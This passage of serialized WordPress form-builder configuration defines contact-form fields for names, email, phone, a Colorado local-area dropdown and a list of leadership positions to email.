Communications</span></span></span></strong></span></h3>\";s:3:\"key\";s:7:\"html_18\";s:15:\"container_class\";s:0:\"\";s:11:\"field_label\";s:4:\"Text\";s:9:\"field_key\";s:7:\"html_18\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:96;}i:1;a:2:{s:8:\"settings\";a:54:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:2;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:7:\"textbox\";s:6:\"def_id\";s:1:\"6\";s:5:\"label\";s:10:\"First Name\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"send_email\";s:1:\"0\";s:10:\"from_email\";s:1:\"0\";s:10:\"first_name\";s:1:\"1\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:9:\"textbox_6\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:10:\"manual_key\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:11:\"field_label\";s:10:\"First Name\";s:9:\"field_key\";s:9:\"textbox_6\";s:21:\"custom_name_attribute\";s:0:\"\";s:23:\"personally_identifiable\";s:0:\"\";s:5:\"value\";s:0:\"\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:97;}i:2;a:2:{s:8:\"settings\";a:51:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:3;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:8:\"lastname\";s:6:\"def_id\";s:1:\"7\";s:5:\"label\";s:9:\"Last Name\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"send_email\";s:1:\"0\";s:10:\"from_email\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:10:\"lastname_8\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:8:\"one-half\";s:11:\"field_label\";s:9:\"Last Name\";s:9:\"field_key\";s:10:\"lastname_8\";s:21:\"custom_name_attribute\";s:5:\"lname\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:98;}i:3;a:2:{s:8:\"settings\";a:50:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:4;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:5:\"email\";s:6:\"def_id\";s:2:\"14\";s:5:\"label\";s:5:\"Email\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"send_email\";s:1:\"0\";s:10:\"from_email\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:14:\"user_address_1\";s:1:\"0\";s:14:\"user_address_2\";s:1:\"0\";s:9:\"user_city\";s:1:\"0\";s:8:\"user_zip\";s:1:\"0\";s:10:\"user_phone\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:8:\"email_10\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:11:\"field_label\";s:5:\"Email\";s:9:\"field_key\";s:8:\"email_10\";s:21:\"custom_name_attribute\";s:5:\"email\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:99;}i:4;a:2:{s:8:\"settings\";a:53:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:5;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:5:\"phone\";s:6:\"def_id\";s:2:\"15\";s:5:\"label\";s:5:\"Phone\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:14:\"(999) 999-9999\";s:10:\"datepicker\";s:1:\"0\";s:10:\"send_email\";s:1:\"0\";s:10:\"from_email\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:14:\"user_address_1\";s:1:\"0\";s:14:\"user_address_2\";s:1:\"0\";s:9:\"user_city\";s:1:\"0\";s:8:\"user_zip\";s:1:\"0\";s:10:\"user_email\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:7:\"phone_9\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:8:\"one-half\";s:10:\"manual_key\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:11:\"field_label\";s:5:\"Phone\";s:9:\"field_key\";s:7:\"phone_9\";s:21:\"custom_name_attribute\";s:5:\"phone\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:100;}i:5;a:2:{s:8:\"settings\";a:31:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:6;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:10:\"listselect\";s:5:\"label\";s:15:\"Your Local Area\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:9:\"list_type\";s:8:\"dropdown\";s:10:\"multi_size\";s:1:\"5\";s:15:\"list_show_value\";s:1:\"1\";s:4:\"list\";a:0:{}s:21:\"user_info_field_group\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:10:\"user_state\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:7:\"options\";a:7:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Boulder\";s:5:\"value\";s:7:\"Boulder\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Co Springs\";s:5:\"value\";s:10:\"Co Springs\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Denver\";s:5:\"value\";s:6:\"Denver\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Loveland\";s:5:\"value\";s:8:\"Loveland\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Western Slope\";s:5:\"value\";s:13:\"Western Slope\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:8:\"selected\";s:1:\"0\";s:5:\"label\";s:5:\"Other\";s:5:\"value\";s:5:\"Other\";s:4:\"calc\";s:0:\"\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}s:3:\"key\";s:13:\"listselect_11\";s:15:\"container_class\";s:0:\"\";s:11:\"field_label\";s:15:\"Your Local Area\";s:9:\"field_key\";s:13:\"listselect_11\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:101;}i:6;a:2:{s:8:\"settings\";a:16:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:7;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:2:\"hr\";s:5:\"label\";s:2:\"hr\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:5:\"hr_13\";s:15:\"container_class\";s:0:\"\";s:11:\"field_label\";s:2:\"hr\";s:9:\"field_key\";s:5:\"hr_13\";}s:2:\"id\";i:102;}i:7;a:2:{s:8:\"settings\";a:19:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:8;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:29:\"Colorado Leadership Positions\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:13:\"default_value\";s:188:\"<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Colorado Leadership Positions</span></span></span></strong></span></h3>\";s:7:\"desc_el\";s:3:\"div\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:7:\"default\";s:188:\"<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Colorado Leadership Positions</span></span></span></strong></span></h3>\";s:3:\"key\";s:7:\"html_14\";s:15:\"container_class\";s:0:\"\";s:11:\"field_label\";s:29:\"Colorado Leadership Positions\";s:9:\"field_key\";s:7:\"html_14\";}s:2:\"id\";i:103;}i:8;a:2:{s:8:\"settings\";a:31:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:9;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:10:\"listselect\";s:5:\"label\";s:41:\"Select the person you would like to email\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:9:\"list_type\";s:8:\"dropdown\";s:10:\"multi_size\";s:1:\"5\";s:15:\"list_show_value\";s:1:\"1\";s:4:\"list\";a:0:{}s:21:\"user_info_field_group\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:10:\"user_state\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:7:\"options\";a:11:{i:0;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";i:0;}i:1;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:32:\"Administrative Services Director\";s:5:\"value\";s:32:\"Administrative Services Director\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons 